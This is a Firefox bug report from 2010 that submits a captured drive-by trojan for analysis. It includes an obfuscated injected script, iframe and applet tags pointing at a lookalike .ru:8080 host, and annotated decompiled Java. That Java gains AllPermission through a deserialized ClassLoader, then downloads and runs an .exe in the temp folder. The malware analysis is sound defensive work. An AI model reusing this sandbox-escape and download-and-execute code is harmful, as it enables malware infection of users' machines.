Closed Bug 541949 Opened 14 years ago Closed 3 years ago

trojan.downloader.js.agent.ewo

Categories

(Firefox :: Security, defect)

3.6 Branch
x86
Windows XP
defect
Not set
critical

Tracking

()

RESOLVED WORKSFORME

People

(Reporter: migabriel.84, Unassigned)

References

(Blocks 1 open bug)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)

We have had problems with a trojan that has been wandering freely on the internet since January 8th, and its actions are not yet completely restricted.
Some websites are infected with a JavaScript code that inserts a dynamic iframe which contains another iframe. The latter loads a Java applet. The applet runs an executable file that somehow accesses the FTP passwords saved in FileZilla and perhaps other FTP clients, connects to them and posts the attached javascript code in every index and javascript file. 
Please analyze the attached malware code, which I managed to obtain using the Firebug addon on a Fedora 12 distribution.

The script that can be found in the web page.
// Analyst note: this is the line injected into the compromised pages. The long literal is a
// script URL padded with the filler characters ! ( # @ ^ $ & ) ; the .replace(regex, '') strips
// them, and document.write() then emits a deferred <script src=...> tag. Splitting the tag into
// '<script src=' and '</scr'+'ipt>' defeats naive signature matching on the literal tag text.
// Applying the same replacement by hand, the decoded host appears to follow the pattern of the
// iframe quoted below (brand-lookalike labels under a .ru domain, port 8080); it is not
// reproduced here. The leading /*Exception*/ comment is part of the injected text itself and
// is a convenient string to search for when cleaning infected files.
/*Exception*/ document.write('<script src='+'h)&t&!#t^p!$:))&/^$/()&##k&!!#e&@e!p#$(!v#i()d)#-!c@#)(o)@m@.)m^y(^w)^(e#&#$b#&)!s#^!#e#()#a(r!c(h!@@.)#(c$o$)m@#&#.#&$!e)@$&m#&p&@f$($l)i$^#x^^)-$()c)o)m(!&.&^(^t($r&#$u))e@^$#l$^$^i)($f^(!e)^f^!#a&^m!^&i$^l#&&@y^#@#&.!#r@#u)@^:$(8!))$0$$#8#!0!$)/(#!(n#@$!&o@^(&@v^i@n$k!y&(.$!!!@c!!@z$$&(/##$(!n$@!o(^#!&v@$!i$&(n$@@k@(y^^.(@c^$z(#/(&^((g)@&o^o$!$$g)l!e#(.)c#&$o)&^$@m@^/(z@e#d!&@#g^^e^!^.@^#@n^$e)^t$&^/^)g@o@@^o^$@@g)$l###e#@.$#c^)o$m@)@.)(p$^&e!/$$!($'.replace(/\!|\(|#|@|\^|\$|&|\)/ig, '')+' defer=defer></scr'+'ipt>');

First IFrame
<!-- Analyst note: the iframe written by the injected script. The hostname stacks
     labels that imitate well-known brands in front of a .ru domain and uses port
     8080; the same host serves the applet jar quoted further down. -->
<iframe src="http://mediafire-com.ebay.it.etsy-com.yourmaxmedia.ru:8080/index.php?ys" />

<!-- Analyst note: landing page served by the first iframe. The script below only
     decides which second-stage iframe to inject, based on installed plugins. -->
<html>
	<head>
		<title>Mxn4rzu36txmtkji6fk9h5roho</title>
	</head>
	<body>
		<script>
		// Each literal is the real string padded with filler characters; the .replace(regex, '')
		// call strips them. Decoded values (obtained by applying the same replacement by hand):
		//   Wub7r6cz  -> <iframe src=pics/ChangeLog.pdf></iframe>
		//   H9102kw5  -> <iframe src=pics/java.html></iframe>
		//   L9z2gkl5f -> Adobe Acrobat
		//   Igp2ybkx  -> Adobe PDF
		// All four are assigned without `var`, so they become globals.
		function Zock8gn(){
		try{
	
		 Wub7r6cz = '<^&($i&@)f$#r)$!&a^(m(&(e! &(s^r&&#&c@@=#!p(^i$!&c^($s)!(/!($)C$(&!h)@&a((n!g^(&e!$L$@^o)((g(!$!.#!&p!&$d$#f$$>!)<&$@)/&$#i)f^r!(&!!a&!(m$^e@#^>#'.replace(/\$|\^|#|\!|@|\)|&|\(/ig, '');
		 H9102kw5 = '<^))i^&f!(!r$@#a^)m@!)e(^@ $s!#r^@^@c@@(=^&p$!i#c$(@s#/$j^a$)&v(a@.!h())t@$&m#@l$#)>((<@^/)!!$i)@$f#&r()a&@m&#@e)^&>^$!'.replace(/#|\)|@|\!|\$|&|\(|\^/ig, '');
		 L9z2gkl5f = 'A&(d&)o)&)^b^^e@@(@ !(A&^^c^)r(@$^!o(^(b!&a)$#^(t$'.replace(/@|#|&|\$|\(|\)|\^|\!/ig, '');
		 Igp2ybkx = 'A$$d$o&!)^&b($&e^&& ^P#D@&^F&#!)'.replace(/\)|\^|@|\(|\!|\$|&|#/ig, '');
		 // If an Adobe PDF plugin is listed, inject the PDF iframe (once per matching plugin entry).
		 for(i = 0; i < navigator.plugins.length; i++){
		 Htj2r5y = navigator.plugins[i].name;
		 if((Htj2r5y.indexOf(L9z2gkl5f) != -1) || (Htj2r5y.indexOf(Igp2ybkx) != -1)){
		 document.write(Wub7r6cz);
		 }
		 }
		}catch(If9yxc2d){}   // any failure is silent
	
		// If Java is enabled, inject the applet page (the "Second IFrame" quoted below).
		try{
		 if (navigator.javaEnabled() ){
		 document.write(H9102kw5);
		 }
		}catch(If9yxc2d){}
	
		}
		// NOTE(review): the leading "25" is most likely a line number that was pasted along
		// with the code; as quoted, this line is a syntax error and the function would
		// never be called. The live page presumably reads just Zock8gn();.
		25Zock8gn(); 
		</script>
	</body>
</html>

Second IFrame
<iframe src="pics/java.html" />
<!-- Analyst note: page reached through the second iframe (pics/java.html). It does
     nothing but load the applet. No <param name="data"> is present in this quoted
     copy, so AppletX.init() (decompiled further down) would pass "" as the download
     URL prefix unless the live page differed. -->
<html>
	<head>
		<title>Mxn4rzu36txmtkji6fk9h5roho</title>
	</head>
	<body>
		<!-- Same .ru:8080 host as the first iframe. archive = the jar to fetch,
		     code = the applet entry class inside it. The "JavaGame" name is cosmetic. -->
		<applet width="300" height="300" archive="http://mediafire-com.ebay.it.etsy-com.yourmaxmedia.ru:8080/pics/JavaGame.jar" code="myf.y.AppletX" />
	</body>
</html>

The jar file

AppletX.java

// Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov  Date: 1/20/2010 5:05:33 PM
// Home Page: http://members.fortunecity.com/neshkov/dj.html  http://www.neshkov.com/dj.html - Check often for new version!
// Decompiler options: packimports(3) 

package myf.y;

import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

// Referenced classes of package myf.y:
//            PayloadX, LoaderX

// Analyst note: decompiled entry point of the applet loaded by the second iframe.
// Everything stated below is what the visible code does; the serialized blob itself
// was removed from this page copy, so its contents cannot be confirmed here.
public class AppletX extends Applet
{

    // Nothing happens at construction; all work is in init().
    public AppletX()
    {
    }

    // Applet lifecycle entry point.
    //  1. Hex-decodes the embedded `serializedObject` string via PayloadX.StringToBytes.
    //  2. Hands the bytes to ObjectInputStream.readObject(). LoaderX.readObject()
    //     assigns LoaderX.instance = this, so a successful deserialization leaves a
    //     LoaderX (a ClassLoader subclass) reachable through that static field.
    //  3. Passes the applet's "data" parameter (default "") and the literal "1" to
    //     LoaderX.instance.bootstrapPayload(...), which does the actual work.
    // Every exception is swallowed, so failures never surface to the user.
    // Detection angle: a ClassLoader subclass arriving through Java serialization
    // inside an applet is the unusual, observable trait of this stage.
    public void init()
    {
        try
        {
            // hex string -> bytes -> deserialize; presumably a serialized LoaderX.
            ObjectInputStream objectinputstream = new ObjectInputStream(new ByteArrayInputStream(PayloadX.StringToBytes(serializedObject)));
            Object obj = objectinputstream.readObject();
            if(obj != null && LoaderX.instance != null)
            {
                String s = "Xeoi2a";   // unused local (decompiler artifact or leftover)
                String s1 = getParameter("data");   // URL prefix for PayloadX; the quoted <applet> tag sets no such param
                String s2 = "1";   // becomes PayloadX.cc, the number of URLs to try
                if(s1 == null)
                    s1 = "";   // with "" as prefix, PayloadX's new URL("" + j) would fail and be swallowed
                LoaderX.instance.bootstrapPayload(s1, s2);
            }
        }
        catch(Exception exception) { }   // deliberately silent
    }

    private static final long serialVersionUID = 0xd30f41af207ff1c8L;
    // Hex-encoded blob (literal removed from this page copy). The 'g' -> '0'
    // substitution is a trivial obfuscation applied before hex decoding.
    private static final String serializedObject = "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".replace('g', '0');
    public static String data = null;   // not read anywhere in the visible code

}

LoaderX.java

// Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov  Date: 1/20/2010 5:06:33 PM
// Home Page: http://members.fortunecity.com/neshkov/dj.html  http://www.neshkov.com/dj.html - Check often for new version!
// Decompiler options: packimports(3) 

package myf.y;

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

// Analyst note: a ClassLoader subclass that is also Serializable. It is never
// constructed with `new` in the visible code; it arrives via the
// ObjectInputStream.readObject() call in AppletX.init(), and readObject() below
// publishes the instance in a static field. Presumably the point is to obtain a
// ClassLoader without going through the sandbox's normal check on ClassLoader
// creation — a historical JRE weakness later closed by plugin updates (the exact
// fix version is not given on this page). The closing comment on the bug notes
// that Firefox no longer loads the Java plugin at all, which removes this vector.
public class LoaderX extends ClassLoader
    implements Serializable
{

    public LoaderX()
    {
    }

    // Standard serialization hook; nothing custom is written.
    private void writeObject(ObjectOutputStream objectoutputstream)
        throws IOException, ClassNotFoundException
    {
        objectoutputstream.defaultWriteObject();
    }

    // Deserialization hook: records the freshly deserialized loader in the static
    // `instance` so AppletX.init() can reach it once readObject() returns.
    private void readObject(ObjectInputStream objectinputstream)
        throws IOException, ClassNotFoundException
    {
        instance = this;
        objectinputstream.defaultReadObject();
    }

    // Reads the bundled PayloadX.class bytes out of the jar, re-defines that class
    // through this loader under a ProtectionDomain carrying AllPermission, and
    // instantiates it. Parameters, as consumed by PayloadX: s -> PayloadX.data
    // (URL prefix), s1 -> PayloadX.cc (decimal download count).
    // Because PayloadX is defined here with AllPermission, its constructor's
    // AccessController.doPrivileged(...) runs with that domain rather than the
    // applet sandbox, which is how the later file and Runtime.exec calls succeed.
    public void bootstrapPayload(String s, String s1)
        throws IOException
    {
        Object obj = null;   // unused
        try
        {
            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
            byte abyte0[] = new byte[8192];
            // Raw class bytes of PayloadX as shipped inside the jar. Never closed.
            InputStream inputstream = getClass().getResourceAsStream("/myf/y/PayloadX.class");
            int i;
            while((i = inputstream.read(abyte0)) > 0) 
                bytearrayoutputstream.write(abyte0, 0, i);
            abyte0 = bytearrayoutputstream.toByteArray();
            // CodeSource "file:///" with no certificates plus an AllPermission set:
            // the class is defined as if it were fully trusted local code.
            URL url = new URL("file:///");
            Certificate acertificate[] = new Certificate[0];
            Permissions permissions = new Permissions();
            permissions.add(new AllPermission());
            ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(url, acertificate), permissions);
            Class class1 = defineClass("myf.y.PayloadX", abyte0, 0, abyte0.length, protectiondomain);
            if(class1 != null)
            {
                // class1 is a separate Class object from the applet-loaded PayloadX,
                // hence the reflective access to its static fields.
                Field field = class1.getField("data");
                Field field1 = class1.getField("cc");
                // First newInstance(): the constructor runs run() while data is still
                // null, which returns immediately — effectively a no-op.
                Object obj1 = class1.newInstance();
                // Both fields are static, so setting them via obj1 configures the class.
                field.set(obj1, s);
                field1.set(obj1, s1);
                // Second newInstance(): constructor -> doPrivileged(this) -> run() with data set.
                obj1 = class1.newInstance();
            }
        }
        catch(Exception exception) { }   // silent on any failure
    }

    private static final long serialVersionUID = 0x5e8b4c67ddc409d8L;
    // Set by readObject(); read by AppletX.init().
    public static LoaderX instance = null;

}

PayloadX.java

// Decompiled by DJ v3.11.11.95 Copyright 2009 Atanas Neshkov  Date: 1/20/2010 5:07:09 PM
// Home Page: http://members.fortunecity.com/neshkov/dj.html  http://www.neshkov.com/dj.html - Check often for new version!
// Decompiler options: packimports(3) 

package myf.y;

import java.io.*;
import java.net.URL;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

// Analyst note: the stage that performs the download-and-execute. It implements
// PrivilegedExceptionAction so that its own constructor can run it under
// AccessController.doPrivileged(); when the class has been defined by LoaderX
// with an AllPermission ProtectionDomain, that is enough to reach the file system
// and Runtime.exec. Configuration arrives through the two public static fields at
// the bottom, which LoaderX.bootstrapPayload() sets reflectively.
public class PayloadX
    implements PrivilegedExceptionAction
{

    // Decodes a hex string into bytes, two characters per byte. Also used by
    // AppletX to unpack its embedded serialized blob. No validation: an odd-length
    // input throws StringIndexOutOfBoundsException, and a non-hex character makes
    // Character.digit return -1 and corrupts that byte.
    public static byte[] StringToBytes(String s)
    {
        byte abyte0[] = new byte[s.length() / 2];
        for(int i = 0; i < s.length(); i += 2)
            abyte0[i / 2] = (byte)((Character.digit(s.charAt(i), 16) << 4) + Character.digit(s.charAt(i + 1), 16));

        return abyte0;
    }

    // Privileged body. Acts only when "os.name" contains "Windows". For j in
    // 0..cc-1 it fetches data + j, writes the response to
    // <java.io.tmpdir>/<Math.random()>.exe and launches that file when at least
    // 1024 bytes were written (presumably to skip error pages and empty responses).
    // Detection angle: an .exe whose name is a bare floating-point number, created
    // in the temp directory by the Java plugin process and then executed, is the
    // host-side artifact of this stage.
    public Object run()
        throws Exception
    {
        if(data == null)
            return null;   // the first instantiation by LoaderX takes this path
        try
        {
            String s = System.getProperty("os.name");
            if(s.indexOf("Windows") >= 0)
            {
                int i = 1;
                if(cc != null)
                    i = Integer.parseInt(cc);   // number of URLs to try ("1" as passed by AppletX)
                for(int j = 0; j < i; j++)
                {
                    // URL is prefix + decimal index; with an empty prefix this throws and is swallowed below.
                    URL url = new URL((new StringBuilder()).append(data).append(Integer.toString(j)).toString());
                    url.openConnection();   // result discarded; openStream() opens its own connection
                    InputStream inputstream = url.openStream();
                    // Random file name under the temp dir: java.io.tmpdir + separator + Math.random() + ".exe"
                    String s1 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append(File.separator).append(Math.random()).append(".exe").toString();
                    FileOutputStream fileoutputstream = new FileOutputStream(s1);
                    int k;
                    int l;
                    // byte-at-a-time copy; k ends up as the number of bytes written
                    for(k = 0; (l = inputstream.read()) != -1; k++)
                        fileoutputstream.write(l);

                    inputstream.close();
                    fileoutputstream.close();
                    if(k >= 1024)
                        Runtime.getRuntime().exec(s1);   // launches the dropped file
                }

            }
        }
        catch(Exception exception) { }   // bad URL, I/O error, parse error: all silent
        return null;
    }

    // Constructing the class is what triggers execution: the constructor
    // immediately runs run() under doPrivileged with this class's own domain.
    public PayloadX()
    {
        try
        {
            AccessController.doPrivileged(this);
        }
        catch(Exception exception) { }   // silent
    }

    public static String data = null;   // URL prefix; null makes run() a no-op
    public static String cc = null;     // decimal count of URLs to try; null means 1

}


Reproducible: Always
Summary: tojan.downloader.js.agent.ewo → trojan.downloader.js.agent.ewo
Group: core-security
Version: unspecified → 3.6 Branch
What should we do with this report?
There is nothing that we can do with it.

Hey Matti,
Are you by any chance able to reproduce this issue or should we close it?

Flags: needinfo?(bugzilla)

I don't think that this report is still useful after all these years.
The LoaderX.java part is also not working anymore since Mozilla stopped supporting the Java plugin.

Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Flags: needinfo?(bugzilla)
Resolution: --- → WORKSFORME